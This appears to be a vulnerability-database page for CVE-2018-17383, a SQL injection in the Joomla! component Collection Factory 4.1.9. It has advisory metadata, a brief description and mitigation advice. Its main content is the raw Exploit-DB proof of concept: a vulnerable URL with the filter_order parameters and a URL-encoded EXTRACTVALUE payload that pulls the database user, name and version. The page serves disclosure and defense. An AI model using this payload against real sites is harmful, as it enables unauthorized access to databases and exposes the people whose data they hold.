Joomla! Component Collection Factory 4.1.9 - SQL Injection

vendor:

Collection Factory

by:

Ihsan Sencan

9.8

CVSS

CRITICAL

SQL Injection

CWE

Product Name: Collection Factory

Affected Version From: 4.1.9

Affected Version To: 4.1.9

Patch Exists: YES

Related CWE: CVE-2018-17383

CPE: a:thephpfactory:collection_factory:4.1.9

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: WiN7_x64/KaLiLinuX_x64

2018

Joomla! Component Collection Factory 4.1.9 – SQL Injection

Joomla! Component Collection Factory 4.1.9 is vulnerable to a SQL injection vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This request contains malicious SQL code that can be executed in the backend database, allowing the attacker to access sensitive information or modify the data stored in the database.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries. Additionally, developers should use parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# # # # #
# Exploit Title: Joomla! Component Collection Factory 4.1.9 - SQL Injection
# Dork: N/A
# Date: 2018-09-24
# Vendor Homepage: https://thephpfactory.com/
# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/thematic-directory/collection-factory/
# Version: 4.1.9
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-17383
# # # # #
# Exploit Author: Ihsan Sencan
# # # # #
# POC: 
# 
# 1)
# http://localhost/[PATH]/collection-categories?option=com_collectionfactory&task=items&filter_order=[SQL]&filter_order_Dir=[SQL]
# 
# %2c%45%58%54%52%41%43%54%56%41%4c%55%45%28%36%36%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%29%29
#  
# # # #